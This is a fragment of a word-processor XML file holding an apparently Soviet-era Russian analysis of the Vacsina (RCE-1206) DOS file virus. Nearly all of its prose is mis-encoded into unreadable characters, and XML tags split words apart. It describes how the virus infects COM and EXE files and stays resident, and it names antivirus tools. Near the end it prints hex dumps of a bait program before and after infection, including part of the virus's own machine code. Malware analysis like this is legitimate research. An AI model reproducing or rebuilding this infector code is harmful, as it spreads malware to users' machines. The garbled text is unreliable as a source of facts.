        <w:t xml:space="preserve">稪 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>EXE-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯥ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>稢��� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ன�� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩�� � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।��� �� ���� �ࠢ�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  ���  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">祭��  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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 �����筮  ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠭����� ���� �� ���� � ��⮬ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ࢮ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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䠩�� � 㪮���� 䠩� �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>132 ����.  EXE-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ॡ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>騥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᢮������  ������ ��⥬� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">(�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠢ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>FFFF ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">६����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MaxMem � ExeHea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ᮬ �� ��ࠦ�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஬� ⮣�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ����� �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">,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�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">64� ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠧ��� ������ �ॢ�ᨫ �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>64� �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��᫥ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>EXE-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩� 䠪��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪨ �ॢ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">頥���  �  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COM-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>筮� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ���� ����ᮬ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㦥 ��� 䠩�� ⨯� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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⠫���� �����  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>믮������ ����� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  �� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪥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ணࠬ�� ����� ����� ᭠</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砫� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">,  ������� ��  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㦥  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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 xml:space="preserve">. �᫨ ���, � �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᠬ �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">⠭������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१������ � ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>墠�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뢠��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">21.  �  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ��  ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪥  ��  �ணࠬ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砥� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠢ�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ���� �� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪠���� �ணࠬ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 �᫨ ���,  � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ��� ������ �ணࠬ�� �� ��᪥</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.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��  �ணࠬ��  �᭮���� �� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">뢠��� ��᫥���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>3 ���⮢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.1. ����� R�E-1206 (��05, VACSINA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���� �������� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>࠭���� � �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㯯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ᬮ�७�� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㯯� �� ��筥� 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R�E-1206  ����  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१������ ����ᮬ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ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䠩�� ⨯� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">,  ⠪ � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩�� ⨯� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>EXE.  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COMMAND.COM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 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>26509 ���⮢ (�᫨ ��� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ࢮ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">砫�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠧ��� �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>25307 ���⮢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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠢��� 1206 (4B6h) ����. ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COM-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩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1206 (4B6h) �� 62867 (F593h) ���� �  EXE-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩��  ������  ��  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>FDB3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 xml:space="preserve">㧪� �� � ������ ��� �믮������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(21-4B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 xml:space="preserve">墠�뢠�� ���뢠��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>2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 xml:space="preserve">ࠦ������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COM-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩�� ����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢���� ���� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. �᫨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 xml:space="preserve">ࠢ��  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">E9h (JMP),  � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩� �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ���� 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㢥��稢����� �� ���祭��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ��⭮�� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠣ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">(16 ����), � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩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 xml:space="preserve">1206  ���� ����� � ���������� ���� 3 ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(JMP �� 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 xml:space="preserve">ࠦ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>EXE-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩�� � ���� �����뢠���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>132 ���� �� ⥫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��������� ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">3 ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">(JMP �� ⥫� �����), �� �⮬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८�ࠧ���� � �ଠ� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COM.  ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᠭ�� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>132 ���� 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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  �� ����⢨� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砥��� � ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ன�� ���ᮢ �ணࠬ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믮������ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ�����  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COM-�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ணࠬ��  �ࠢ�����  ��������  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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9h) ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।����� �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砫� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>묨 ��������� ����� 㧭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 䠩�� � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢���� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">稥 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᢮�� ����� � ����� ������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  ��  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  � ����� ������� ��� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ�� � 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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ⠪�� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, ��⠥��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१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���� ��� ������� ����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਢ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>易��  �  ������� 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: �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧ������ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㪮��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᨣ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(B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⭠� ����  ����� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㦨������ ��⥬ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᬮ�� ᯨ᪠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 xml:space="preserve">ணࠬ� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(� ������� �⨫�� MAP,  SMAP,  MMAP � �.�.).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������⥫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쭠�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>" �������⥫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쭠� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �� ������ 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த�⥫� � ������ ࠧ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1200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१������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �����  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯮ�����  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砨 ����㧪� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ண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�� �� ����� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪥� ��� ࠧ����� ������� � �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠥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⠪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ᮧ���� �� ��᪥ ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">祭�� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮤ�ন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ண� �� ᥣ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>譨� ������ ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">᭨�� �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪨� �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 ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">祢� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>[11], ����� ����� ������᪮� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ந�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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ࠧࠡ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠭ � ���� 1988 �.  � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">᪢� ����� ����� ��᭮� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1989 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��� ����� � �������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠬ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਮ��⥭�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>묨 � ������  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᪨� ������⨢�� � ᥭ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1989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ᮢ��᪨� ���஢ ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>R��-1206 �����,  ��-��������,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ᠭ �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.��⨪�� � ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㬥��樨 � ��� �����⭮� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ணࠬ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ANTI-K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䠣�� ��⨢ ������� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ப� �ᯮ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>짮���訬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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">뫠 ���� �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>࠭��� ���ᨩ ������⥪��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>-����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠣� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ANTI-KOT.  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頥� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧࠡ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>稪</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ANTI-KOT ����� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �� � ����⨢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 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१����⭠� ���� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  �᫨ �� �⮬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㣠� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१����⭠� �ணࠬ�� �� �������� ����� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">뢠��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>21h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᪠ �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, � ������� ����������� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠫ������� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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१���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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ଠ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Vacsina, S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ணࠬ��� �।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢠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 ⠡�.3. �������� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䥪⨢�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>TP48CLS. ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>設�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">⢮ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮯ஢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䠣��  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯥ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>譮  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠢ������  �  �⨬  ����ᮬ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  �  ��⭮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����䠣 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.�.�����᪮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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ணࠬ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>DUMY1823.COM, �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ���� ����� ����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0   E9 02 01 90 90 90 90 90 90 90 90 90 90 90 90 9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   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 9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᫥���� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ப�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ������� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।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00   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 9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0   90 90 90 90 90 90 90 90 90 90 90 90 90 C3 1A      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ࠣ���� ����� �ணࠬ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>DUMY1823.COM, ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ����� ����ᮬ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>RCE-1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0   E9 C9 0A 90 90 90 90 90 90 90 90 90 90 90 90 9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   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 9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᫥���� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ப�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ������� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।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00   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 9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0   90 90 90 90 90 90 90 90 90 90 90 90 90 C3 1A 9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0   4D 07 00 4B 00 00 00 00 00 00 00 00 00 00 00 00   M..K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0   60 02 0B 10 56 05 AB 0E 20 00 05 00 90 90 90 90   `...V...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0   90 90 C3 1A 00 56 41 43 53 49 4E 41 20 20 20 20   .....VACS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0   00 00 80 00 00 00 00 00 7C 11 37 A8 00 40 C2 00   ........|.7..@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0   46 0A 00 00 00 00 00 00 00 20 20 20 20 20 20 20   F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70   20 20 20 20 20 20 20 20 20 20 20 20 20 E8 00 00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0   5B 50 8C C0 05 10 00 8B 0E 0E 01 03 C8 89 4F FB   [P...........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0   8B 0E 16 01 03 C8 89 4F F7 8B 0E 10 01 89 4F F9   .......O.....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A0   8B 0E 14 01 89 4F F5 8B 3E 18 01 8B 16 08 01 B1   .....O..&gt;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B0   04 D3 E2 8B 0E 06 01 E3 17 26 C5 B5 00 01 83 C7   .........&amp;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C0   04 8C DD 26 03 2E 08 01 03 E8 8E DD 01 04 E2 E9   ...&amp;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D0   0E 1F BF 00 01 8B F2 81 C6 00 01 8B CB 2B CE F3   .............+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E0   A4 58 FA 8E 57 FB 8B 67 F9 FB FF 6F F5 B0 03 CF   .X..W..g...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F0   9C 3D 00 4B 74 06 9D 2E FF 2E 00 00 06 1E 55 57   .=.Kt.........UW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0   56 52 51 53 50 8B EC B8 24 35 CD 21 2E 8C 06 06   VRQSP...$5.!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0   00 2E 89 1E 04 00 0E 1F BA BD 00 B8 24 25 CD 21   ............$%.!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0920   0E 1F BA 14 00 B4 0F CD 21 B8 00 43 8E 5E 0E 8B   ........!..C.^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30   56 06 CD 21 73 03 E9 DA 01 2E 89 0E 08 00 B8 01   V..!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40   43 80 E1 FE CD 21 73 03 E9 C8 01 B8 02 3D 8E 5E   C....!s......=.^</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0950   0E 8B 56 06 CD 21 73 03 E9 A8 01 2E A3 0A 00 8B   ..V..!s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60   D8 0E 1F BA 0C 00 B9 06 00 B4 3F CD 21 72 19 3D   ..........?.!r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70   06 00 75 14 2E 81 3E 0C 00 4D 5A 75 03 E9 B5 01   ..u...&gt;..MZu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80   2E 80 3E 0C 00 E9 74 03 E9 6F 01 B8 02 42 B9 00   ..&gt;...t..o...B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90   00 8B D1 2E 8B 1E 0A 00 CD 21 72 EC 83 FA 00 75   .........!r....u</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>09A0   E7 3D B6 04 76 E2 3D 93 F5 73 DD 2E A3 9E 04 2E   .=..v.=..s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B0   A1 0D 00 05 03 01 2E A3 A0 04 B8 02 42 B9 FF FF   ............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C0   BA F8 FF 2E 8B 1E 0A 00 CD 21 72 BC 2E 8B 1E 0A   .........!r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D0   00 0E 1F BA 0C 00 B9 08 00 B4 3F CD 21 72 A9 3D   ..........?.!r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E0   08 00 75 A4 2E 81 3E 10 00 F4 7A 75 77 2E 83 3E   ..u...&gt;...zuw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9F0   12 00 05 90 73 92 2E A1 0C 00 2E A3 9E 04 2E A1   ....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00   0E 00 2E A3 A0 04 2D 03 01 2E A3 0C 00 B8 00 42   ......-........B</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0A10   B9 00 00 BA 01 00 2E 8B 1E 0A 00 CD 21 72 5F B4   ............!r_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20   40 0E 1F BA 0C 00 B9 02 00 CD 21 72 51 3D 02 00   @.........!rQ=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  ... ... ... ... ... ... ... ... ... ... ... ...   ... ... ..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C80   2E 8B 16 2C 00 4A 8E C2 26 8C 0E 01 00 B8 21 35   ...,.J..&amp;.....!5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0C90   53 CD 21 36 8C 06 02 00 36 89 1E 00 00 5B B8 21   S.!6....6....[.!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0CA0   25 8C D2 8E DA BA C0 00 CD 21 B8 00 00 8E C0 26   %........!.....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0CB0   C7 06 C5 00 7F 39 26 C6 06 C7 00 05 8C C8 8E D8   ....9&amp;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CC0   B4 1A BA 50 00 CD 21 2E 8B 47 FB E9 4E FF 1F 07   ...P..!..G..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CD0   05 02�F4 7A 05�00                                 ...z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ਬ�� ����� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뤠������ �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ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��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ����� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
